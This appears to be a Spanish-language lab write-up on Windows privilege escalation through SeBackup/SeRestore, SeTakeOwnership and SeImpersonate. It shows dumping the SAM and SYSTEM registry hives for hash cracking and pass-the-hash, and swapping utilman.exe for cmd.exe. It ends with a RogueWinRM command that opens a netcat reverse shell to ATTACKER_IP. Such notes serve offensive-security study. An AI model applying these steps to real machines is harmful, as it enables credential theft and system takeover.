Abusing dangerous privileges
Cada usuario tiene sus privilegios asignados en Windows, se puede ver así con: whoami \priv
SeBackup / SeRestore
Esto privilegios, permiten al usuario leer y escribir cualquier archivo del sistema, ignorando la DACL existente. La idea detrás de este privilegio es permitir al usuario realizar copias de seguridad sin requerir permisos de administrador.
Para obtener la consola con esos privilegios, tenemos que ejecutarla como administrador y introducir nuestra contraseña
Ahora vemos nuestros privilegios con whoami \priv
C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeBackupPrivilege Back up files and directories Disabled SeRestorePrivilege Restore files and directories Disabled SeShutdownPrivilege Shut down the system Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set DisabledCon esto podríamos hacer una copia de seguridad de los hahes SAM y SYSTEM
C:\> reg save hklm\system C:\Users\victim\system.hive
The operation completed successfully.
C:\> reg save hklm\sam C:\Users\victim\sam.hive
The operation completed successfully.Esto cread 2 archivos que podemos compartirnos por SMB a la maquina kali (atacante) para crakearlos
Esto crea un recuso compartido a nivel de red llamado public, que apunta a share, nuestro directorio compartido. Que para acceder requiere el nombre de usuario y la contraseña de nuestra sesión actual de windows. Ahora podemos utilizar el comando copy para compartir el archvio que queramos:
Ahora con impacket recuperamos los hahes de las contraseñas de estos users
Ahora podemos utilizar el hash del Administrator para hacer un ataque Pass-the-Hash y tener acceso con privilegios SYSTEM con psexec
SeTakeOwnership
Este privilegio permite a un usuario tomar propiedad de cualquier objeto en el sistema, incluyendo archivos y claves de registro.
Lo primero abrir la terminal como administrador para lanzar whoami \priv
Ahora abusaremos de la utilman.exe para escalar el privilegio. Esta es una aplicación integrada de Windows que se utiliza para dar opciones de "Facilidad" en al pantalla de bloqueo
Este se ejecuta con privilegios del Sistema, asi que si remplazamos el binario a cualquier payload, conseguiremos esos permiso
Ser el propietario de un fichero no significa necesariamente que tengas privilegios sobre él, pero siendo el propietario puedes asignarte los privilegios que necesites. Para dar a tu usuario permisos completos sobre utilman.exe puedes usar el siguiente comando:
Ahora solo hace falta sustituir el utilman.exe por cmd.exe
Ahora para activar el ultiman, solo hace falta darle al botón de lock de pantalla en el inicio
Y darle al botón de "Ease od access" que ejecuta utilman.exe -> ahora cmd.exe con privilegios de SISTEMA.
SeImpersonate / SeAssignPrimaryToken
En este caso, para hacer la escalada, necesitamos dos condiciones: 1º Crear un proceso para que los usuarios puedan conectarse y autenticarse para suplantarlo 2º Encontrar una forma de forzar a los usuarios con privilegios (Adminsitrator) a conectarse y autenticarse en el proceso malicioso generado
Utilizare el exploit RogueWinRM
Asumiendo que ya hemos comprometido un sitio web que se ejecuta en IIS y que hemos plantado un web shell en http://10.10.56.114/
Para utilizar RogueWinRM, primero necesitamos subir el exploit a la máquina victima.
Ahora me pongo en escucha por nc en mi maquina de atacante user@attackerpc$ nc -lvp 4442
Y lanzo el exploit desde esa webshell
c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe ATTACKER_IP 4442"
Last updated